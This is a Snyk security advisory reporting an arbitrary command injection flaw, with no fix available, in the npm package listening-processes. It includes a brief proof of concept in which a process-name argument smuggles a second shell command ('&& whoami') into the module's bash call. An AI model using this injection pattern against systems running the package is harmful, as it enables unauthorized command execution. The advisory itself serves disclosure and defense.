Arbitrary Code Injection Affecting listening-processes package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-LISTENINGPROCESSES-544025
- published 3 Feb 2020
- disclosed 2 Feb 2020
- credit notpwnguy
How to fix?
There is no fixed version for listening-processes
.
Overview
listening-processes is a simple NPM module for retrieving pertinent info on processes which are listening on local ports, and for killing those processes using shell commands in the background.
Affected versions of this package are vulnerable to Arbitrary Code Injection. An attacker can execute arbitrary commands by escaping the binaries used by the module since it uses bash commands.
PoC
$ node
> const processes = require('listening-processes')
> processes(`'Python && whoami >> hh;'`)
/bin/sh: \s.*:[0-9]* (LISTEN): command not found
{ Python:
[ { command: 'Python',
pid: '14720',
port: '8000',
invokingCommand:
'/usr/local/Cellar/python/3.7.0/Frameworks/Python.framework/Versions/3.7/Resources/Python.app/Contents/MacOS/Python -m http.server' } ] }
References
CVSS Scores
version 3.1